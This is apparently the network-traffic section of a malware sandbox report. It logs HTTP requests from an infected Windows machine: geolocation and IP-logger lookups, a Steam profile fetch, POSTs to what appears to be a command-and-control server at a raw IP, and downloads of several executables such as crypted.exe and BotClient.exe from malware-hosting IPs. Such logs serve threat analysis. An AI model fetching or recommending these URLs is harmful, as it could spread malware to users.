Network Analysis

GET /demo/home.php?s= HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Sat, 20 Jul 2024 11:27:26 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive x-iplb-request-id: AC46C791:4A4E_93878F2E:0050_669B9F1E_19338777:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nxydQB%2BVKL7Ga%2F9S1Bq2t08FzCvAZujHsGYhEHuL0Ff5WM4aklUPx72NRiG%2B2DZyKLJwPx2yNwDlfmcgUtaH6VE4Lig1XtoiHjDkPXw16X41WGUKFqiWzvNtAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a629a19fa7e29e3-FUK alt-svc: h3=":443"; ma=86400

GET /1nhuM4.js HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: iplogger.org

HTTP/1.1 200 OK Date: Sat, 20 Jul 2024 11:28:29 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive memory: 0.42801666259765625 expires: Sat, 20 Jul 2024 11:28:28 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=31536000 x-frame-options: SAMEORIGIN CF-Cache-Status: BYPASS Set-Cookie: 405890042949678744=3; expires=Sun, 20 Jul 2025 11:28:28 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=175.208.134.152; expires=Sun, 20 Jul 2025 11:28:28 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rc2yr09NxQpYEgVt%2F31U1AIvxvPEIjkN9FSjsV8PlnD%2FEHlNs7LuUXR7nQSZ%2FIzUyUTGX4ClIBIKsJazRPxQvkQoDKCCzF5m3BsZjI75BmK8K5qD66SceZwozKsJJcw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a629ba10adc2f33-LAX alt-svc: h3=":443"; ma=86400

GET /profiles/76561199743486170 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 20 Jul 2024 11:28:39 GMT Content-Length: 34778 Connection: keep-alive Set-Cookie: sessionid=26b5e6bc331bf0d19405cb39; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=KR%7Cf412d3b2c2b6515b2cdce927ad7acf7b; Path=/; Secure; HttpOnly; SameSite=None

GET /api/crazyfish.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 91.103.252.177

HTTP/1.1 200 OK Date: Sat, 20 Jul 2024 11:27:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Sat, 20 Jul 2024 12:27:25 GMT Date: Sat, 20 Jul 2024 11:27:25 GMT Connection: keep-alive

POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 133 Host: 91.103.252.177

HTTP/1.1 200 OK Date: Sat, 20 Jul 2024 11:27:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1644 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /prog/669a659129ee2_crypted.exe#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 79.137.192.13 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 20 Jul 2024 11:27:39 GMT Content-Type: application/octet-stream Content-Length: 519168 Last-Modified: Fri, 19 Jul 2024 13:09:37 GMT Connection: keep-alive ETag: "669a6591-7ec00" Accept-Ranges: bytes

HEAD /prog/669b5b78252ea_googlesoft.exe#mene HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 79.137.192.13 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 20 Jul 2024 11:27:39 GMT Content-Type: application/octet-stream Content-Length: 5448704 Last-Modified: Sat, 20 Jul 2024 06:38:48 GMT Connection: keep-alive ETag: "669b5b78-532400" Accept-Ranges: bytes

HEAD /download/th/space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Sat, 20 Jul 2024 11:27:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=publicsoft.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 5261312 Content-Type: application/octet-stream

HEAD /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Sat, 20 Jul 2024 11:27:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 17 Jun 2024 13:05:54 GMT ETag: "a13400-61b15a0111080" Accept-Ranges: bytes Content-Length: 10564608 Content-Type: application/x-msdownload

HEAD /psyzh HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 176.111.174.109 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 20 Jul 2024 11:27:38 GMT Content-Type: application/octet-stream Content-Length: 0 Connection: keep-alive Content-Disposition: attachment; filename="KKuE1Lqffi.exe" Server-Timing: total;dur=25.3;desc="Total Response Time" content-transfer-encoding: Binary

HEAD /eee01/eee01.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 94.232.45.38 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sat, 20 Jul 2024 11:27:39 GMT Content-Type: application/octet-stream Content-Length: 431104 Last-Modified: Mon, 06 May 2024 10:57:55 GMT Connection: keep-alive ETag: "6638b7b3-69400" Accept-Ranges: bytes

HEAD /d/385132 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 89.111.172.64 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Sat, 20 Jul 2024 11:27:39 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1261119635701366828/1264150213883461642/setup.exe?ex=669cd321&is=669b81a1&hm=d821b50925b9d92ab6d6482acd8fc0ebdd4b7073c14d68659850bc48ac42da1c&

HEAD /prog/6692518842cd4_BotClient.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 79.137.192.13 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 20 Jul 2024 11:27:39 GMT Content-Type: application/octet-stream Content-Length: 3828752 Last-Modified: Sat, 13 Jul 2024 10:06:00 GMT Connection: keep-alive ETag: "66925188-3a6c10" Accept-Ranges: bytes

HEAD /prog/6696621cecc83_crypted.exe#xin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 79.137.192.13 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 20 Jul 2024 11:27:39 GMT Content-Type: application/octet-stream Content-Length: 599080 Last-Modified: Tue, 16 Jul 2024 12:05:48 GMT Connection: keep-alive ETag: "6696621c-92428" Accept-Ranges: bytes

GET /prog/669a659129ee2_crypted.exe#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 79.137.192.13 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 20 Jul 2024 11:27:39 GMT Content-Type: application/octet-stream Content-Length: 519168 Last-Modified: Fri, 19 Jul 2024 13:09:37 GMT Connection: keep-alive ETag: "669a6591-7ec00" Accept-Ranges: bytes

GET /prog/669b5b78252ea_googlesoft.exe#mene HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 79.137.192.13 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 20 Jul 2024 11:27:39 GMT Content-Type: application/octet-stream Content-Length: 5448704 Last-Modified: Sat, 20 Jul 2024 06:38:48 GMT Connection: keep-alive ETag: "669b5b78-532400" Accept-Ranges: bytes

GET /download/th/space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Sat, 20 Jul 2024 11:27:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=publicsoft.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 5261312 Content-Type: application/octet-stream

GET /download/123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 77.105.133.27 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Sat, 20 Jul 2024 11:27:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 17 Jun 2024 13:05:54 GMT ETag: "a13400-61b15a0111080" Accept-Ranges: bytes Content-Length: 10564608 Content-Type: application/x-msdownload

GET /eee01/eee01.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 94.232.45.38 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sat, 20 Jul 2024 11:27:39 GMT Content-Type: application/octet-stream Content-Length: 431104 Last-Modified: Mon, 06 May 2024 10:57:55 GMT Connection: keep-alive ETag: "6638b7b3-69400" Accept-Ranges: bytes

GET /psyzh HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 176.111.174.109 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 20 Jul 2024 11:27:38 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Content-Disposition: attachment; filename="DJ7nOnOZOm.exe" Server-Timing: total;dur=1.9;desc="Total Response Time" content-transfer-encoding: Binary

GET /d/385132 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 89.111.172.64 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Sat, 20 Jul 2024 11:27:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1261119635701366828/1264150213883461642/setup.exe?ex=669cd321&is=669b81a1&hm=d821b50925b9d92ab6d6482acd8fc0ebdd4b7073c14d68659850bc48ac42da1c&

GET /prog/6692518842cd4_BotClient.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 79.137.192.13 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 20 Jul 2024 11:27:42 GMT Content-Type: application/octet-stream Content-Length: 3828752 Last-Modified: Sat, 13 Jul 2024 10:06:00 GMT Connection: keep-alive ETag: "66925188-3a6c10" Accept-Ranges: bytes

GET /prog/6696621cecc83_crypted.exe#xin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 79.137.192.13 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 20 Jul 2024 11:27:59 GMT Content-Type: application/octet-stream Content-Length: 599080 Last-Modified: Tue, 16 Jul 2024 12:05:48 GMT Connection: keep-alive ETag: "6696621c-92428" Accept-Ranges: bytes

POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 453 Host: 91.103.252.177

HTTP/1.1 200 OK Date: Sat, 20 Jul 2024 11:28:25 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8